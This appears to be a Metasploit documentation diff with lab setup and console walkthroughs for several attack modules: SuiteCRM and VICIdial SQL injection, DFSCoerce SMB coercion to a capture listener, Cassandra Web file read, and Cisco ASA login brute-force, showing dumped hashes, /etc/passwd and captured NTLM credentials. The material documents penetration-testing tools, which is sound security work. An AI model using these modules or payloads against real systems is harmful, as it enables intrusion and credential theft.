+    1. `sudo chown -R www-data:www-data .`
+    1. `sudo chmod -R 755 .`
+    1. `sudo chmod -R 775 custom modules themes data upload`
+    1. `sudo chmod 775 config_override.php 2>/dev/null`
+    1. Navigate to http://localhost/install.php and follow the installation wizard to complete the install
+    
+
+## Verification Steps
+
+1. Start up metasploit
+1. Do: `use auxiliary/gather/suite_crm_export_sqli`
+1. Do: `set RHOSTS [IP]`
+1. Configure a user and password by setting `USERNAME` and `PASSWORD`.
+1. Do: `run`
+
+## Scenarios
+
+### SuiteCRM 7.12.5 Bitnami Docker Image
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/suite_crm_export_sqli 
+msf6 auxiliary(gather/suite_crm_export_sqli) > show options
+
+Module options (auxiliary/gather/suite_crm_export_sqli):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   COUNT     3                no        Number of users to enumerate
+   PASSWORD                   yes       Password for user
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasp
+                                        loit
+   RPORT     80               yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   USERNAME                   yes       Username of user
+   VHOST                      no        HTTP server virtual host
+
+
+Auxiliary action:
+
+   Name              Description
+   ----              -----------
+   Dump credentials  Dumps usernames and passwords from the users table
+
+
+msf6 auxiliary(gather/suite_crm_export_sqli) > set USERNAME user
+USERNAME => user
+msf6 auxiliary(gather/suite_crm_export_sqli) > set PASSWORD bitnami
+PASSWORD => bitnami
+msf6 auxiliary(gather/suite_crm_export_sqli) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(gather/suite_crm_export_sqli) > check
+
+[*] Authenticating as user
+[+] Authenticated as: user
+[*] Version detected: 7.12.5
+[+] 127.0.0.1:80 - The target is vulnerable.
+msf6 auxiliary(gather/suite_crm_export_sqli) > run
+[*] Running module against 127.0.0.1
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Authenticating as user
+[+] Authenticated as: user
+[*] Version detected: 7.12.5
+[+] The target is vulnerable.
+[*] Fetching Users, please wait...
+SuiteCRM User Names
+===================
+
+ Username
+ --------
+ testuser
+ user
+
+[*] Fetching Hashes, please wait...
+[+] (1/2) Username : testuser ; Hash : $2y$10$YFr9.QNPVDXoLKv5FQo7d.UIRBSMTnPGDS2LLHsuGSojAA2Q5kELa
+[+] (2/2) Username : user ; Hash : $2y$10$O83wcCVEfY7GKo//dbQwwOFOevfLFnhpP4d9n98HmGM2YPxJZqMhO
+SuiteCRM User Credentials
+=========================
+
+ Username  Hash
+ --------  ----
+ testuser  $2y$10$YFr9.QNPVDXoLKv5FQo7d.UIRBSMTnPGDS2LLHsuGSojAA2Q5kELa
+ user      $2y$10$O83wcCVEfY7GKo//dbQwwOFOevfLFnhpP4d9n98HmGM2YPxJZqMhO
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/suite_crm_export_sqli) > 
+```
@@ -0,0 +1,62 @@
+## Vulnerable Application
+
+Coerce an authentication attempt over SMB to other machines via MS-DFSNM methods.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/dcerpc/dfscoerce`
+4. Set the `RHOSTS` and `LISTENER` options
+5. Set the `SMBUser`, `SMBPass` for authentication
+6. (Optional) Set the `METHOD` options to adjust the trigger vector
+7. Do: `run`
+
+## Options
+
+### LISTENER
+The host listening for the incoming connection. The target will authenticate to this host using SMB. The listener host
+should be hosting some kind of capture or relaying service.
+
+### METHOD
+The RPC method to use for triggering.
+
+## Scenarios
+
+### Windows Server 2019
+In this case, Metasploit is hosting an SMB capture server to log the incoming credentials from the target machine
+account. The target is a 64-bit Windows Server 2019 domain controller.
+
+```
+msf6 > use auxiliary/server/capture/smb 
+msf6 auxiliary(server/capture/smb) > run
+[*] Auxiliary module running as background job 0.
+msf6 auxiliary(server/capture/smb) > 
+[*] Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+
+msf6 auxiliary(server/capture/smb) > use auxiliary/scanner/dcerpc/dfscoerce 
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set VERBOSE true
+VERBOSE => true
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > run
+
+[*] 192.168.159.96:445    - Connecting to Distributed File System (DFS) Namespace Management Protocol
+[*] 192.168.159.96:445    - Binding to \netdfs...
+[+] 192.168.159.96:445    - Bound to \netdfs
+[+] Received SMB connection on Auth Capture Server!
+[SMB] NTLMv2-SSP Client     : 192.168.250.237
+[SMB] NTLMv2-SSP Username   : MSFLAB\WIN-3MSP8K2LCGC$
+[SMB] NTLMv2-SSP Hash       : WIN-3MSP8K2LCGC$::MSFLAB:971293df35be0d1c:804d2d329912e92a442698d0c6c94f08:01010000000000000088afa3c78cd801bc3c7ed684c95125000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f0055005000070008000088afa3c78cd80106000400020000000800300030000000000000000000000000400000f0ba0ee40cb1f6efed7ad8606610712042fbfffb837f66d85a2dfc3aa03019b00a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003200350030002e003100330034000000000000000000
+
+[+] 192.168.159.96:445    - Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful
+[*] 192.168.159.96:445    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/dcerpc/dfscoerce) >
+```
@@ -0,0 +1,100 @@
+## Vulnerable Application
+[Cassandra Web](https://rubygems.org/gems/cassandra-web) is an interface for Apache Cassandra using Ruby, Event-machine, AngularJS,
+Server-Sent-Events and DataStaxRuby driver for Apache Cassandra.
+
+This module has been tested successfully on Cassandra Web versions:
+* cassandra-web-0.5.0 on Debian 10.11 (buster) with ruby 2.5.5p157 and Apache Cassandra 3.11.13
+
+### Description
+
+This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web
+'Cassandra Web' version 0.5.0 and earlier, allowing arbitrary file read with the web server privileges.
+This vulnerability occured due to the disabled Rack::Protection module.
+
+This web service listens on TCP port 3000 by default on all network interface.
+
+Source and Installers:
+* [Source Code Repository](https://github.com/avalanche123/cassandra-web)
+* [Installers](https://rubygems.org/gems/cassandra-web)
+
+Ruby installation:
+```
+apt install ruby-full -y
+```
+
+Gem installation:
+```
+gem install cassandra-web
+```
+
+Apache Cassandra Installation:
+```
+cat << EOF > /etc/apt/sources.list.d/cassandra.list
+deb https://www.apache.org/dist/cassandra/debian 311x main
+EOF
+cat << EOF > /etc/apt/sources.list.d/adoptopenjdk.list
+deb https://adoptopenjdk.jfrog.io/adoptopenjdk/deb/ buster main
+EOF
+wget -q -O - https://www.apache.org/dist/cassandra/KEYS | apt-key add -
+wget -qO - https://adoptopenjdk.jfrog.io/adoptopenjdk/api/gpg/key/public | apt-key add -
+apt update && apt install adoptopenjdk-8-hotspot cassandra -y
+```
+
+Run Cassandra Web:
+```
+cassandra-web
+```
+
+## Verification Steps
+1. Do: `use auxiliary/scanner/http/cassandra_web_file_read.rb`
+2. Do: `set RHOSTS [ips]`
+3. Do: `run`
+
+## Options
+
+## Scenarios
+### Cassandra Web 0.5.0 Linux Debian 10.11 (Ruby 2.5.5p157 and Apache Cassandra 3.11.13)
+```
+msf6 > use auxiliary/scanner/http/cassandra_web_file_read
+msf6 auxiliary(scanner/http/cassandra_web_file_read) > set RHOSTS 192.168.56.1
+RHOSTS => 192.168.56.1
+msf6 auxiliary(scanner/http/cassandra_web_file_read) > run
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Cassandra Web Detected
+[*] Downloading file...
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
+avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
+sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
+systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
+ntp:x:107:115::/nonexistent:/usr/sbin/nologin
+cassandra:x:108:116:Cassandra database,,,:/var/lib/cassandra:/usr/sbin/nologin
+
+
+[+] File saved in: /home/git/.msf4/loot/20220802185716_default_192.168.56.1_cassandra.web.tr_160962.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,132 @@
+## Vulnerable Application
+
+### Description
+
+This module scans for the Cisco ASA ASDM landing page and performs login brute-force
+to identify valid credentials.
+
+### Installation
+
+Acquire a Cisco ASA device or virtual machine. For this description we will use
+Cisco Adaptive Security Virtual Appliance (ASAv) VMWare Package 9.18.1 (asav9-18-1.zip):
+
+* https://software.cisco.com/download/home/286119613/type/280775065/release/9.18.1
+
+The [official installation guide can be found here](https://www.cisco.com/c/en/us/td/docs/security/asa/asa98/asav/quick-start-book/asav-98-qsg/asav-vmware.html)
+But for completeness, the following will guide the user to a full testing configuration.
+To start we'll make ASDM remotely accessible:
+
+1. Unzip the package
+1. Import `asav-esxi.ovf` in VMWare Fusion (or your VMWare product of choice).
+1. Select the `ASAv5 - 1 Core / 2 GB (100 Mbps)` deployment option.
+1. After the import is complete, assign `Network Adapter` (1 is implied) the desired
+interface (e.g. I'll use `Wi-Fi` for my setup).
+1. Start the virtual machine
+1. Allow GRUB to boot the first option (this should happen twice)
+1. When provided with a command prompt (`ciscoasa>`) type `en`.
+1. Set an enable password (e.g. `labpass1`)
+1. Enter the following in the command line interface:
+1. `conf t`
+1. `No`
+1. `interface GigabitEthernet 0/0`
+1. `nameif outside`
+1. Assign a static ip address (note the assigned address should make sense within the
+context of you lab. For example, my lab network is 10.9.49.0/24): `ip address 10.9.49.201 255.255.255.0`
+1. `no shutdown`
+1. `exit`
+1. Set the default route (the last IP should point to your lab router): `route outside 0.0.0.0 0.0.0.0 10.9.49.1`
+1. Verify you can ping an outside host (e.g. `ping 8.8.8.8`)
+1. `http server enable`
+1. `http 0.0.0.0 0.0.0.0 outside`
+1. `write`
+1. `exit`
+
+You should now be able to reach the ASA's web server remotely. From a remote host, execute the following `curl`
+command to the ASA to verify as much:
+
+```
+albinolobster@ubuntu:~$ curl -kv https://10.9.49.201
+*   Trying 10.9.49.201:443...
+* TCP_NODELAY set
+...
+> GET / HTTP/1.1`
+> Host: 10.9.49.201
+> User-Agent: curl/7.68.0
+> Accept: */*
+> 
+* Mark bundle as not supporting multiuse
+< HTTP/1.1 301 Moved Permanently
+< Date: Tue, 21 Jun 2022 13:52:33 UTC
+< Strict-Transport-Security: max-age=31536000
+< X-XSS-Protection: 1
+< Connection: close
+< Location: /admin/public/index.html
+< 
+* Closing connection 0
+* TLSv1.2 (OUT), TLS alert, close notify (256):
+```
+
+You should now be able to test the credentials `<Blank>:labpass1` and `enable_15:labpass1`. To
+add additional users to test with, let's use ASDM from a Windows machine:
+
+1. Connect to your ASA's web interface (e.g. `https://10.9.49.201/admin/public/index.html`).
+1. Click "Install ASDM Launcher"
+1. Enter creds `blank`:labpass1 (where blank is nothing and labpass1 is your enable password)
+1. Install the downloaded `dm-launcher.msi` (before 7.18.1 it will be unsigned)
+1. If Java isn't installed, install Java 1.8 (current at time of writing is 8 Update 333): https://www.java.com/en/download/
+1. Start the ASDM Launcher via `C:\Program Files (x86)\Cisco Systems\ASDM\run.bat`
+1. Enter your ASAv's IP address (10.9.249.201)
+1. Enter a blank username
+1. Enter the enable password (`labpass1`)
+1. Go to `Configuration -> Device Management -> Users/AAA -> User Accounts`
+1. Click `Add`
+1. Set the username to `cisco`
+1. Set the password to `cisco123`
+1. Keep the default settings for `Access Restrictions` (Full access with privilege level of 2).
+1. Hit `OK`
+1. Hit `Apply`
+
+You should now be able to log in to the ASDM using `cisco`:`cisco123`.
+
+## Verification Steps
+
+* Follow the above instructions to configure ASAv, ASDM, and add the `cisco` user for testing
+* Do: `use auxiliary/scanner/http/cisco_asa_asdm_bruteforce`
+* Do: `set RHOST <ip>`
+* Do: `set VERBOSE false`
+* Do: `run`
+* You should see output indicating `cisco:cisco123` was successfully used for login.
+
+## Options
+
+### USERPASS_FILE
+
+File containing users and passwords separated by space, one pair per line.
+
+### USER_FILE
+
+File containing users, one per line.
+
+### PASS_FILE
+
+File containing passwords, one per line
+
+## Scenarios
+
+### ASAv 9.18.1 with ASDM enabled and the `cisco:cisco123` creds set.
+
+```
+msf6 > use auxiliary/scanner/http/cisco_asa_asdm_bruteforce
+msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > set RHOST 10.9.49.201
+RHOST => 10.9.49.201
+msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > set VERBOSE false
+VERBOSE => false
+msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > run
+
+[*] The remote target appears to host Cisco ASA ASDM. The module will continue.
+[*] Starting login brute force...
+[+] SUCCESSFUL LOGIN - "cisco":"cisco123"
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > 
+```
@@ -0,0 +1,196 @@
+## Vulnerable Application
+
+### Description
+
+This module scans for Cisco ASA Clientless SSL VPN (WebVPN) web login portals and
+performs login brute-force to identify valid credentials.
+
+### Installation
+
+Acquire a Cisco ASA device or virtual machine. For this description we will use
+Cisco Adaptive Security Virtual Appliance (ASAv) VMWare Package 9.18.1 (asav9-18-1.zip):
+
+* https://software.cisco.com/download/home/286119613/type/280775065/release/9.18.1
+
+The [official installation guide can be found here](https://www.cisco.com/c/en/us/td/docs/security/asa/asa98/asav/quick-start-book/asav-98-qsg/asav-vmware.html)
+But for completeness, the following will guide the user to a full testing configuration.
+To start we'll make ASDM remotely accessible:
+
+1. Unzip the package
+1. Import `asav-esxi.ovf` in VMWare Fusion (or your VMWare product of choice).
+1. Select the `ASAv5 - 1 Core / 2 GB (100 Mbps)` deployment option.
+1. After the import is complete assign `Network Adapter` (1 is implied) the desired
+interface (e.g. I'll use `Wi-Fi` for my setup).
+1. Start the virtual machine
+1. Allow GRUB to boot the first option (this should happen twice)
+1. When provided with a command prompt (`ciscoasa>`) type `en`.
+1. Set an enable password (e.g. `labpass1`)
+1. Enter the following in the command line interface:
+1. `conf t`
+1. `No`
+1. `interface GigabitEthernet 0/0`
+1. `nameif outside`
+1. Assign a static ip address (note the assigned address should make sense within the
+context of you lab. For example, my lab network is 10.9.49.0/24): `ip address 10.9.49.201 255.255.255.0`
+1. `no shutdown`
+1. `exit`
+1. Set the default route (the last IP should point to your lab router): `route outside 0.0.0.0 0.0.0.0 10.9.49.1`
+1. Verify you can ping an outside host (e.g. `ping 8.8.8.8`)
+1. `http server enable`
+1. `http 0.0.0.0 0.0.0.0 outside`
+1. `write`
+1. `exit`
+
+You should now be able to reach the ASA's web server remotely. From a remote host, execute the following `curl`
+command to the ASA to verify as much:
+
+```
+albinolobster@ubuntu:~$ curl -kv https://10.9.49.201
+*   Trying 10.9.49.201:443...
+* TCP_NODELAY set
+...
+> GET / HTTP/1.1`
+> Host: 10.9.49.201
+> User-Agent: curl/7.68.0
+> Accept: */*
+> 
+* Mark bundle as not supporting multiuse
+< HTTP/1.1 301 Moved Permanently
+< Date: Tue, 21 Jun 2022 13:52:33 UTC
+< Strict-Transport-Security: max-age=31536000
+< X-XSS-Protection: 1
+< Connection: close
+< Location: /admin/public/index.html
+< 
+* Closing connection 0
+* TLSv1.2 (OUT), TLS alert, close notify (256):
+```
+
+The next part of the installation will require a Windows machine. From your Windows machine:
+
+1. Connect to your ASA's web interface (e.g. `https://10.9.49.201/admin/public/index.html`).
+1. Click "Install ASDM Launcher"
+1. Enter creds `blank`:labpass1 (where blank is nothing and labpass1 is your enable password)
+1. Install the downloaded `dm-launcher.msi` (before 7.18.1 it will be unsigned)
+1. If Java isn't installed, intall Java 1.8 (current at time of writing is 8 Update 333): https://www.java.com/en/download/
+1. Start the ASDM Launcher via `C:\Program Files (x86)\Cisco Systems\ASDM\run.bat`
+1. Enter your ASAv's IP address (10.9.249.201)
+1. Enter a blank username
+1. Enter the enable password (`labpass1`)
+
+Now to enable the webvpn interface from ASDM:
+
+1. Go to `Configuration -> Remote Access VPN -> Clientless SSL VPN Access -> Connection Profiles`
+1. In the `Access Interfaces` view, click the radio button to `Allow Access` from the `outside` interface
+1. Hit apply
+
+Verify that the Clientless SSL VPN is now enabled by navigating to the SSL VPN login on your ASA. For example,
+navigate to `https://10.9.49.201/+CSCOE+/logon.html`.
+
+Next, we'll create a Clientless SSL VPN user for brute-force testing. From ASDM:
+
+1. Go to `Configuration -> Device Management -> Users/AAA -> User Accounts`
+1. Click `Add`
+1. Keep the default username (`user1`)
+1. Enter and confirm a password (e.g. `user1`)
+1. Set the privilege level to 0 (I'm not sure this step is actually required but)
+1. Select the `No ASDM, SSH, Telnet, or Console access` radio
+1. Hit `OK`
+1. Hit `Apply`
+
+Finally, we'll enable logging into the SSL VPN portal:
+
+1. Go to `Configuration -> Device Management -> Users/AAA -> Dynamic Access Policies`
+1. Select the `DfltAccessPolicy` and click `Edit`
+1. Select `Access Method` tab
+1. Click on the `Web-Portal` radio button
+
+You should now be able to log in to the SSL VPN web portal using `user1`:`user1`.
+
+## Verification Steps
+
+* Follow the above instructions to configure ASAv, Clientless SSL VPN, and add a user for testing
+* Add the user to `data/wordlists/http_default_userpass.txt` as `user1 user1`
+* Do: `use auxiliary/scanner/http/cisco_asa_clientless_vpn`
+* Do: `set RHOST <ip>`
+* Do: `set VERBOSE false`
+* Do: `run`
+* You should see output indicating `user1:user1` was successfully used for login.
+
+## Options
+
+### GROUP
+
+The connection profile to use. By default this is blank, but administrators can configure various different
+profiles that users can select from the drop down menu at the top of the login page. The alias in the drop
+down is *not* the value of `GROUP`. You need to extract it from the HTML.
+
+For example, my administrator has a profile named `TunnelGroup1` using the alias `alias1`. The drop down menu
+will show `alias1` but `TunnelGroup1` is the required value. In the page's HTML you'll find:
+
+```
+<option value="TunnelGroup1" selected>alias1</option>
+```
+
+To use `TunnelGroup1` you'd `set GROUP TunnelGroup1`.
+
+### USERPASS_FILE
+
+File containing users and passwords separated by space, one pair per line.
+
+### USER_FILE
+
+File containing users, one per line.
+
+### PASS_FILE
+
+File containing passwords, one per line
+
+## Scenarios
+
+### ASAv 9.18.1 with Clientless SSL VPN enabled and the `user1:user1` creds set.
+
+Simply using the default HTTP username and password lists and `user1:user1` added to
+`data/wordlists/http_default_userpass.txt`.
+
+```
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > use auxiliary/scanner/http/cisco_asa_clientless_vpn
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > set VERBOSE false
+VERBOSE => false
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > set RHOST 10.9.49.201
+RHOST => 10.9.49.201
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > run
+
+[*] The remote target appears to host Cisco SSL VPN Service. The module will continue.
+[*] Starting login brute force...
+[+] SUCCESSFUL LOGIN - "user1":"user1"
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > 
+```
+
+## ASAv 9.18.1 with Clientless SSL VPN enabled and the `user1:user1` on the `TunnelGroup1` Connection Profile
+
+```
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > use auxiliary/scanner/http/cisco_asa_clientless_vpn
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > set VERBOSE false
+VERBOSE => false
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > set RHOST 10.9.49.201
+RHOST => 10.9.49.201
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > run
+
+[*] The remote target appears to host Cisco SSL VPN Service. The module will continue.
+[*] Starting login brute force...
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > set GROUP TunnelGroup1
+GROUP => TunnelGroup1
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > run
+
+[*] The remote target appears to host Cisco SSL VPN Service. The module will continue.
+[*] Starting login brute force...
+[+] SUCCESSFUL LOGIN - "user1":"user1"
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > 
+```
@@ -5,6 +5,8 @@ default username and password.  Tested against Dell Remote Access:

 - Controller 6 - Express version 1.50 and 1.85,
 - Controller 7 - Enterprise 2.63.60.62
+- Controller 8 - Enterprise 2.83.05
+- Controller 9 - Enterprise 4.40.00.00

 ## Verification Steps

@@ -1,47 +0,0 @@
-## Description
-
-This module queries a host or range of hosts and pull the SSL certificate information if one is installed.
-
-## Verification Steps
-
-1. Do: ```use auxiliary/scanner/http/ssl```
-2. Do: ```set RHOSTS [IP]```
-3. Do: ```set THREADS [num of threads]```
-4. Do: ```run```
-
-## Scenarios
-
-```
-msf > use auxiliary/scanner/http/ssl
-msf auxiliary(ssl) > set RHOSTS 192.168.1.200-254
-RHOSTS => 192.168.1.200-254
-msf auxiliary(ssl) > set THREADS 20
-THREADS => 20
-msf auxiliary(ssl) > run
-
-[*] Error: 192.168.1.205: OpenSSL::SSL::SSLError SSL_connect SYSCALL returned=5 errno=0 state=SSLv3 read server hello A
-[*] Error: 192.168.1.206: OpenSSL::SSL::SSLError SSL_connect SYSCALL returned=5 errno=0 state=SSLv3 read server hello A
-[*] 192.168.1.208:443 Subject: /C=--/ST=SomeState/L=SomeCity/O=SomeOrganization/OU=SomeOrganizationalUnit/CN=localhost.localdomain/emailAddress=root@localhost.localdomain Signature Alg: md5WithRSAEncryption
-[*] 192.168.1.208:443 WARNING: Signature algorithm using MD5 (md5WithRSAEncryption)
-[*] 192.168.1.208:443 has common name localhost.localdomain
-[*] 192.168.1.211:443 Subject: /C=--/ST=SomeState/L=SomeCity/O=SomeOrganization/OU=SomeOrganizationalUnit/CN=localhost.localdomain/emailAddress=root@localhost.localdomain Signature Alg: sha1WithRSAEncryption
-[*] 192.168.1.211:443 has common name localhost.localdomain
-[*] Scanned 13 of 55 hosts (023% complete)
-[*] Error: 192.168.1.227: OpenSSL::SSL::SSLError SSL_connect SYSCALL returned=5 errno=0 state=SSLv3 read server hello A
-[*] 192.168.1.223:443 Subject: /CN=localhost Signature Alg: sha1WithRSAEncryption
-[*] 192.168.1.223:443 has common name localhost
-[*] 192.168.1.222:443 WARNING: Signature algorithm using MD5 (md5WithRSAEncryption)
-[*] 192.168.1.222:443 has common name MAILMAN
-[*] Scanned 30 of 55 hosts (054% complete)
-[*] Scanned 31 of 55 hosts (056% complete)
-[*] Scanned 39 of 55 hosts (070% complete)
-[*] Scanned 41 of 55 hosts (074% complete)
-[*] Scanned 43 of 55 hosts (078% complete)
-[*] Scanned 45 of 55 hosts (081% complete)
-[*] Scanned 46 of 55 hosts (083% complete)
-[*] Scanned 53 of 55 hosts (096% complete)
-[*] Scanned 55 of 55 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssl) >
-```
-
@@ -0,0 +1,212 @@
+## Vulnerable Application
+
+This module exploits several authenticated SQL Inject vulnerabilities in VICIdial 2.14b0.5 prior to
+svn/trunk revision 3555 (VICIBox 10.0.0, prior to January 20 is vulnerable).
+
+- Injection point 1 is on vicidial/admin.php when adding a user, in the modify_email_accounts parameter.
+- Injection point 2 is on vicidial/admin.php when adding a user, in the access_recordings parameter.
+- Injection point 3 is on vicidial/admin.php when adding a user, in the agentcall_email parameter.
+- Injection point 4 is on vicidial/AST_agent_time_sheet.php when adding a user, in the agent parameter.
+- Injection point 5 is on vicidial/user_stats.php when adding a user, in the file_download parameter.
+
+|                                           | v9.0.3                         | v10.0.0                        |
+| ----------------------------------------- | ------------------------------ | ------------------------------ |
+| List Users - access_recordings method     | X                              | X                              |
+| List Users - agent_time_sheet method      | `view reports` must be enabled | `view reports` must be enabled |
+| List Users - agentcall_email method       | X                              | X                              |
+| List Users - modify_email_accounts method | X                              | X                              |
+| List Users - user_stats method            | `view reports` must be enabled | `view reports` must be enabled |
+
+VICIdial does not encrypt passwords by default.
+
+VICIBox/VICIdial includes an auto-update mechanism, so be aware for creating vulnerable boxes.
+
+### Install
+
+#### 9.0.3 & 10.0.0
+
+1. Install the following OpenSUSE 10 ISO [ViciBox_v9.x86_64-9.0.3.iso](http://download.vicidial.com/iso/vicibox/server/ViciBox_v9.x86_64-9.0.3.iso)
+or [ViciBox_v10.x86_64-10.0.0.iso](http://download.vicidial.com/iso/vicibox/server/archive/ViciBox_v10.x86_64-10.0.0.iso) :
+    1. Change the default password (`root`:`vicidial`)
+    2. Set Timezone, Keyboard Layout, ok the license, and Language
+    3. Network settings should autoconfigure (Tested on VMware Fusion). Network settings can be configured with the 
+        command `yast lan` if necessary
+2. Run `vicibox-express` to initiate the ViciDial Express Installation, everything can be kept as default
+3. Navigate to `http://<ip-address>/`
+    1. Click `Administration` and login with default credentials username: `6666`, password: `1234`
+    2. Once logged in, Click `Continue on to the Initial Setup`. Everything can be kept as default. 
+4. The complete list of setup instructions can be found by following this [link](http://download.vicidial.com/iso/vicibox/server/ViciBox_v9-install.pdf)
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/vicidial_multiple_sqli`
+1. Do: `set username <username>`
+1. Do: `set password <password>`
+1. Do `show actions`
+   1. Select from the list or keep the default
+1. Do: `run`
+1. The module will exploit the selected SQL injection and return the extracted usernames and passwords
+
+## Options
+
+### Password
+
+Password for the vicidial instance that corresponds to the username.
+
+### Username
+
+Username for the user to login with. Defaults to admin username of `6666`.
+
+## Scenarios
+
+### ViciBox 9.0.3 - List Users - modify_email_accounts method
+
+```
+msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
+password => notpassword
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - modify_email_accounts method
+action => List Users - modify_email_accounts method
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
+
+[*] Enumerating Usernames and Password Hashes
+[*] {SQLi} Executing (select group_concat(TXMlUAF) from (select cast(concat_ws(';',ifnull(user,''),ifnull(pass,'')) as binary) TXMlUAF from vicidial_users limit 3) jUFFwQn)
+[*] {SQLi} Encoded to (select group_concat(TXMlUAF) from (select cast(concat_ws(0x3b,ifnull(user,repeat(0x87,0)),ifnull(pass,repeat(0x52,0))) as binary) TXMlUAF from vicidial_users limit 3) jUFFwQn)
+[*] {SQLi} Time-based injection: expecting output of length 46
+[!] No active DB -- Credential data will not be saved!
+[+] Dumped table contents:
+vicidial_users
+==============
+
+ user  pass
+ ----  ----
+ 6666  notpassword
+ VDAD  donotedit
+ VDCL  donotedit
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### ViciBox 9.0.3 - List Users - access_recordings method
+
+```
+msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
+password => notpassword
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - access_recordings method
+action => List Users - access_recordings method
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
+
+[*] Enumerating Usernames and Password Hashes
+[+] Dumped table contents:
